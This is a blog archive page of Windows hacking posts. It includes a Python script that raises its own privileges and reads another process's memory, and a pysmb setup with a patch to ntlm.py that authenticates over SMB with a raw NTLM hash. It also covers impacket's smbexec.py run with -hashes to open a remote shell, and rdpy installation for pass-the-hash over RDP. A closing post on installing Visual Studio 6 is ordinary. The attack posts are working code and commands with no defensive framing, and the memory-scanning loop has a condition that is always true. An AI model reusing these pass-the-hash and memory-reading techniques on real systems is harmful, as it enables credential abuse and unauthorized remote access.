January 2020 – Page 2 – ControllingTheInter.net

Reading memory with Python

from ctypes import *
from ctypes.wintypes import *
import time
import os, sys
import win32security
import tempfile
import win32api, win32con
from ntsecuritycon import TokenSessionId, TokenSandBoxInert, TokenType, TokenImpersonationLevel, TokenVirtualizationEnabled, TokenVirtualizationAllowed, TokenHasRestrictions, TokenElevationType, TokenUIAccess, TokenUser, TokenOwner, TokenGroups, TokenRestrictedSids, TokenPrivileges, TokenPrimaryGroup, TokenSource, TokenDefaultDacl, TokenStatistics, TokenOrigin, TokenLinkedToken, TokenLogonSid, TokenElevation, TokenIntegrityLevel, TokenMandatoryPolicy, SE_ASSIGNPRIMARYTOKEN_NAME, SE_BACKUP_NAME, SE_CREATE_PAGEFILE_NAME, SE_CREATE_TOKEN_NAME, SE_DEBUG_NAME, SE_LOAD_DRIVER_NAME, SE_MACHINE_ACCOUNT_NAME, SE_RESTORE_NAME, SE_SHUTDOWN_NAME, SE_TAKE_OWNERSHIP_NAME, SE_TCB_NAME
OpenProcess = windll.kernel32.OpenProcess
ReadProcessMemory = windll.kernel32.ReadProcessMemory
CloseHandle = windll.kernel32.CloseHandle
def get_extra_privs():
    # Try to give ourselves some extra privs (only works if we're admin):
    # SeBackupPrivilege   - so we can read anything
    # SeDebugPrivilege    - so we can find out about other processes (otherwise OpenProcess will fail for some)
    # SeSecurityPrivilege - ??? what does this do?
    # Problem: Vista+ support "Protected" processes, e.g. audiodg.exe.  We can't see info about these.
    # Interesting post on why Protected Process aren't really secure anyway: http://www.alex-ionescu.com/?p=34
    th = win32security.OpenProcessToken(win32api.GetCurrentProcess(), win32con.TOKEN_ADJUST_PRIVILEGES | win32con.TOKEN_QUERY)
    privs = win32security.GetTokenInformation(th, TokenPrivileges)
    newprivs = []
    for privtuple in privs:
        if privtuple[0] == win32security.LookupPrivilegeValue(None, "SeBackupPrivilege") or privtuple[0] == win32security.LookupPrivilegeValue(None, "SeDebugPrivilege") or privtuple[0] == win32security.LookupPrivilegeValue(None, "SeSecurityPrivilege"):
            print("Added privilege " + str(privtuple[0]))
            # privtuple[1] = 2 # tuples are immutable.  WHY?!
            newprivs.append((privtuple[0], 2)) # SE_PRIVILEGE_ENABLED
        else:
            newprivs.append((privtuple[0], privtuple[1]))
    # Adjust privs
    privs = tuple(newprivs)
    str(win32security.AdjustTokenPrivileges(th, False , privs))
PROCESS_ALL_ACCESS = 0x1F0FFF
pid = 1012   # I assume you have this from somewhere.
#address = 0x1000000  # Likewise; for illustration I'll get the .exe header.
address = 0x4100000
buffer = create_string_buffer(0x10000)
bufferSize = len(buffer)#len(buffer.value)
bytesRead = c_ulong(0)
get_extra_privs()
processHandle = OpenProcess(PROCESS_ALL_ACCESS, False, pid)
if processHandle:
    print("Buffersize: ", bufferSize)
    time.sleep(3)
    while address &lt;= (address+0x1000000):
        if ReadProcessMemory(processHandle, address, buffer, bufferSize, byref(bytesRead)):
            for ii in range(0, bufferSize):
                if (buffer[ii] != 0x1):
                    #print("Success:", address, buffer)
                    print("Success:", hex(address))
                    #print("b'" + ''.join('\\x{:02x}'.format(x) for x in buffer) + "'")
                    print (":".join("{:02x}".format(ord(c)) for c in buffer))
                    continue
        else:
            print("Failed@", hex(address))
        address += 0x1000
    CloseHandle(processHandle)
else:
    print("Unable to open process: ", processHandle)

from ctypes import *

from ctypes.wintypes import *

import time

import os, sys

import win32security

import tempfile

import win32api, win32con

from ntsecuritycon import TokenSessionId, TokenSandBoxInert, TokenType, TokenImpersonationLevel, TokenVirtualizationEnabled, TokenVirtualizationAllowed, TokenHasRestrictions, TokenElevationType, TokenUIAccess, TokenUser, TokenOwner, TokenGroups, TokenRestrictedSids, TokenPrivileges, TokenPrimaryGroup, TokenSource, TokenDefaultDacl, TokenStatistics, TokenOrigin, TokenLinkedToken, TokenLogonSid, TokenElevation, TokenIntegrityLevel, TokenMandatoryPolicy, SE_ASSIGNPRIMARYTOKEN_NAME, SE_BACKUP_NAME, SE_CREATE_PAGEFILE_NAME, SE_CREATE_TOKEN_NAME, SE_DEBUG_NAME, SE_LOAD_DRIVER_NAME, SE_MACHINE_ACCOUNT_NAME, SE_RESTORE_NAME, SE_SHUTDOWN_NAME, SE_TAKE_OWNERSHIP_NAME, SE_TCB_NAME

OpenProcess = windll.kernel32.OpenProcess

ReadProcessMemory = windll.kernel32.ReadProcessMemory

CloseHandle = windll.kernel32.CloseHandle

def get_extra_privs():

# Try to give ourselves some extra privs (only works if we're admin):

# SeBackupPrivilege - so we can read anything

# SeDebugPrivilege - so we can find out about other processes (otherwise OpenProcess will fail for some)

# SeSecurityPrivilege - ??? what does this do?

# Problem: Vista+ support "Protected" processes, e.g. audiodg.exe. We can't see info about these.

# Interesting post on why Protected Process aren't really secure anyway: http://www.alex-ionescu.com/?p=34

th = win32security.OpenProcessToken(win32api.GetCurrentProcess(), win32con.TOKEN_ADJUST_PRIVILEGES | win32con.TOKEN_QUERY)

privs = win32security.GetTokenInformation(th, TokenPrivileges)

newprivs = []

for privtuple in privs:

if privtuple[0] == win32security.LookupPrivilegeValue(None, "SeBackupPrivilege") or privtuple[0] == win32security.LookupPrivilegeValue(None, "SeDebugPrivilege") or privtuple[0] == win32security.LookupPrivilegeValue(None, "SeSecurityPrivilege"):

print("Added privilege " + str(privtuple[0]))

# privtuple[1] = 2 # tuples are immutable. WHY?!

newprivs.append((privtuple[0], 2)) # SE_PRIVILEGE_ENABLED

else:

newprivs.append((privtuple[0], privtuple[1]))

# Adjust privs

privs = tuple(newprivs)

str(win32security.AdjustTokenPrivileges(th, False , privs))

PROCESS_ALL_ACCESS = 0x1F0FFF

pid = 1012 # I assume you have this from somewhere.

#address = 0x1000000 # Likewise; for illustration I'll get the .exe header.

address = 0x4100000

buffer = create_string_buffer(0x10000)

bufferSize = len(buffer)#len(buffer.value)

bytesRead = c_ulong(0)

get_extra_privs()

processHandle = OpenProcess(PROCESS_ALL_ACCESS, False, pid)

if processHandle:

print("Buffersize: ", bufferSize)

time.sleep(3)

while address <= (address+0x1000000):

if ReadProcessMemory(processHandle, address, buffer, bufferSize, byref(bytesRead)):

for ii in range(0, bufferSize):

if (buffer[ii] != 0x1):

#print("Success:", address, buffer)

print("Success:", hex(address))

#print("b'" + ''.join('\\x{:02x}'.format(x) for x in buffer) + "'")

print (":".join("{:02x}".format(ord(c)) for c in buffer))

continue

else:

print("Failed@", hex(address))

address += 0x1000

CloseHandle(processHandle)

else:

print("Unable to open process: ", processHandle)

Passing the Hash with Python SMB

git clone https://github.com/miketeo/pysmb.git python setup.py install Then drop this in test.py

import sys
import pprint
from smb.SMBConnection import SMBConnection
from util import getConnectionInfo
conn = SMBConnection("UserAccount", "!31:70:ae:1e:3e:NT:LM:Hash:Goes:Here:a9:37:fc:e3", "Your IP Here", "RemoteHostname", use_ntlm_v2 = True, is_direct_tcp = True)
conn.connect("RemoteHostName", 445) #Use  IS TCP Direct on 445 and 135 for the other
results = conn.listShares()
for smbtest in [r.name.lower() for r in results]:
    print(smbtest)
# pretty print loaded modules
#pprint.pprint(sys.modules)
#filelist = conn.listPath('shared_folder_name', '/')

import sys

import pprint

from smb.SMBConnection import SMBConnection

from util import getConnectionInfo

conn = SMBConnection("UserAccount", "!31:70:ae:1e:3e:NT:LM:Hash:Goes:Here:a9:37:fc:e3", "Your IP Here", "RemoteHostname", use_ntlm_v2 = True, is_direct_tcp = True)

conn.connect("RemoteHostName", 445) #Use IS TCP Direct on 445 and 135 for the other

results = conn.listShares()

for smbtest in [r.name.lower() for r in results]:

print(smbtest)

# pretty print loaded modules

#pprint.pprint(sys.modules)

#filelist = conn.listPath('shared_folder_name', '/')

Modify this code in Python\pysmb\python3\smb -> ntlm.py

def generateChallengeResponseV2(password, user, server_challenge, server_info, domain = '', client_challenge = None):
    client_timestamp = b'\0' * 8
    if not client_challenge:
        client_challenge = bytes([ random.getrandbits(8) for i in range(0, 8) ])
    assert len(client_challenge) == 8
    if password.startswith("!"):
        #ntlm_hash = password[1:].replace(":", "").decode("hex")
        ntlm_hash = bytes.fromhex(password[1:].replace(":", ""))
    else:
        d = MD4()
        d.update(password.encode('UTF-16LE'))
        ntlm_hash = d.digest()   # The NT password hash
        print("b'" + ''.join('\\x{:02x}'.format(x) for x in ntlm_hash) + "'")
        #print(ntlm_hash)
    response_key = hmac.new(ntlm_hash, (user.upper() + domain).encode('UTF-16LE'), 'md5').digest()  # The NTLMv2 password hash. In [MS-NLMP], this is the result of NTOWFv2 and LMOWFv2 functions
    temp = b'\x01\x01' + b'\0'*6 + client_timestamp + client_challenge + b'\0'*4 + server_info
    ntproofstr = hmac.new(response_key, server_challenge + temp, 'md5').digest()
    nt_challenge_response = ntproofstr + temp
    lm_challenge_response = hmac.new(response_key, server_challenge + client_challenge, 'md5').digest() + client_challenge
    session_key = hmac.new(response_key, ntproofstr, 'md5').digest()
    for line in traceback.format_stack():
         print(line.strip())
    return nt_challenge_response, lm_challenge_response, session_key

def generateChallengeResponseV2(password, user, server_challenge, server_info, domain = '', client_challenge = None):

client_timestamp = b'\0' * 8

if not client_challenge:

client_challenge = bytes([ random.getrandbits(8) for i in range(0, 8) ])

assert len(client_challenge) == 8

if password.startswith("!"):

#ntlm_hash = password[1:].replace(":", "").decode("hex")

ntlm_hash = bytes.fromhex(password[1:].replace(":", ""))

else:

d = MD4()

d.update(password.encode('UTF-16LE'))

ntlm_hash = d.digest() # The NT password hash

print("b'" + ''.join('\\x{:02x}'.format(x) for x in ntlm_hash) + "'")

#print(ntlm_hash)

response_key = hmac.new(ntlm_hash, (user.upper() + domain).encode('UTF-16LE'), 'md5').digest() # The NTLMv2 password hash. In [MS-NLMP], this is the result of NTOWFv2 and LMOWFv2 functions

temp = b'\x01\x01' + b'\0'*6 + client_timestamp + client_challenge + b'\0'*4 + server_info

ntproofstr = hmac.new(response_key, server_challenge + temp, 'md5').digest()

nt_challenge_response = ntproofstr + temp

lm_challenge_response = hmac.new(response_key, server_challenge + client_challenge, 'md5').digest() + client_challenge

session_key = hmac.new(response_key, ntproofstr, 'md5').digest()

for line in traceback.format_stack():

print(line.strip())

return nt_challenge_response, lm_challenge_response, session_key

Z:\Programming\Python\pysmb\python3\tests\SMBConnectionTests>test.py File “Z:\Programming\Python\pysmb\python3\tests\SMBConnectionTests\test.py”, line 7, in conn.connect(“Hostname”, 445) File “C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\SMBConnection.py”, line 124, in connect self._pollForNetBIOSPacket(timeout) File “C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\smb\SMBConnection.py”, line 634, in _pollForNetBIOSPacket self.feedData(data) File “C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\nmb\base.py”, line 54, in feedData self._processNMBSessionPacket(self.data_nmb) File “C:\Users\User\AppData\Local\Programs\Python\Python38-32\lib\site-packages\pysmb-1.1.28-py3.8.egg\nmb\base.py”, line 75, in _processNMBSessionPacket …

Continue reading “Passing the Hash with Python SMB”

Installing Impacet

git https://github.com/SecureAuthCorp/impacket.git pip install –upgrade pip –trusted-host pypi.org –trusted-host files.pythonhosted.org . python smbclient.py https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ python setup.py install Python\impacket\examples>python smbclient.py or Python\impacket\examples>smbclient.py smbexec.py Domain/Username:YourPassword@HostOfServer or \Python\impacket\examples>smbexec.py Domain/Username@ServerHostname -hashes E52CLMHASHGOESHERE168F41AFC3A96:3170221NTLMHASHGOESHERE937FCE3 Impacket v0.9.21-dev – Copyright 2019 SecureAuth Corporation [!] Launching semi-interactive shell – Careful what you execute C:\Windows\system32>set But you can really just use this “smbexec.py Domain/Username@ServerHostname -hashes …

Continue reading “Installing Impacet”

Python Code for Passing the Hash

Install PIP and run

pip rdpy --trusted-host pypi.org --trusted-host files.pythonhosted.org
pip install pyinstaller --trusted-host pypi.org --trusted-host files.pythonhosted.org
pip install pywin32 --trusted-host pypi.org --trusted-host files.pythonhosted.org

pip rdpy --trusted-host pypi.org --trusted-host files.pythonhosted.org

pip install pyinstaller --trusted-host pypi.org --trusted-host files.pythonhosted.org

pip install pywin32 --trusted-host pypi.org --trusted-host files.pythonhosted.org

git https://github.com/citronneur/rdpy.git python setup.py install

1 2	git https://github.com/citronneur/rdpy.git python setup.py install

for python 2.7 Then Install PyQt4 from here, note that this only works on 2.7 -> https://pypi.org/project/PyQt4/ You may also get the link from here, https://github.com/citronneur/rdpy (in the windows section) (This will not work and will error out, this is for 2.7 only) for python 3.8+ Run this …

Continue reading “Python Code for Passing the Hash”

Install Visual Studio 6 on Windows 10

http://nuke.vbcorner.net/Articles/VB60/VisualStudio6Installer/tabid/93/language/en-US/Default.aspx Recommendation Minimize 03/24/2016 Important note for Windows 10, Windows 7, Windows XP SP3 You must install and run VS6Installer 5.x ‘as administrator’, otherwise you get a error. Right-click on VS6Installer.exe -> Run As Administrator If you have already tried to install VB 6.0, before using VS6 Installer then you must: uninstall VB 6.0 and …

Continue reading “Install Visual Studio 6 on Windows 10”